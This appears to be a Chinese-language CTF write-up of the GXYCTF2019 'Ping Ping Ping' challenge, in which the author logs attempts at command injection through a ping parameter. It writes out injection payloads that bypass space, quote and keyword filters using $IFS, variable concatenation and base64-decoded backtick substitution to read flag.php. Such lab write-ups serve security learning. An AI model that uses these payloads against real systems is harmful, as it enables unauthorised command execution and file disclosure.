[GXYCTF2019]Ping Ping Ping

非常简单的页面

[GXYCTF2019]Ping Ping Ping

 看题目 猜到可能是用命令执行   比如 ping 127.0.0.1;ls

[GXYCTF2019]Ping Ping Ping

 不会这么简单吧 不会吧 不会吧

[GXYCTF2019]Ping Ping Ping

 操

怀疑是被脚本 控制了 不让用cat

fuzz 手动测 惨

[GXYCTF2019]Ping Ping Ping

 把flag.php 过滤了

空格 也过滤 了 

{} 也过滤了 

只好拼接

%都过滤 是人么

[GXYCTF2019]Ping Ping Ping

[GXYCTF2019]Ping Ping Ping

 有可能是 黑名单

构造 a=c;b=at;c=fl;d=ag;$a$b$IFS$9$c$d.php

[GXYCTF2019]Ping Ping Ping

 说明服务端用了正则过滤 flag

只能编码解码绕过了

因为空格只放了 $IFS$9 难受

构造 cat$IFS$9`echo$IFS$9"ZmxhZy5waHA="|base64$IFS$9-d`

[GXYCTF2019]Ping Ping Ping

 双引号过滤 了   单引号也是 离谱

`也过滤了 结束了

之前 想盲打 忘记搞index.php了  它没做什么过滤

[GXYCTF2019]Ping Ping Ping

 和之前祥云杯的好像啊

主要是 他把""都过滤了

e...看了看wp 还是拼接 不过是换了下顺序绕过 匹配到的flag

之前看过好像 忘了  

构造 127.0.0.1;a=g.php;b=fla;cat$IFS$9$b$a

[GXYCTF2019]Ping Ping Ping

 还以为失败了 结果 

[GXYCTF2019]Ping Ping Ping

 感觉之前 我好像也找到了 白页  应该是假的 `过滤了

再试试

 1;cat$IFS$9`echo$IFS$9ZmxhZy5waHA=|base64$IFS$9-d`

可以过 操

[GXYCTF2019]Ping Ping Ping

 刚才做出来了 显示个白页 以为错了 跑去看wp 难受 不过没关系 啊    不看wp 我可能还想不起来 打乱顺序绕preg正则匹配

多积累方法总是好的

[GXYCTF2019]Ping Ping Ping

 想到过 直接用 cat 打开所有文件 但是 不知道语法  可惜

试试

[GXYCTF2019]Ping Ping Ping

 $IFS$x x为任何数字好像都行 

[GXYCTF2019]Ping Ping Ping

 [GXYCTF2019]Ping Ping Ping

 前 2个应该都行 第三个因为过滤了 双引号 失效

over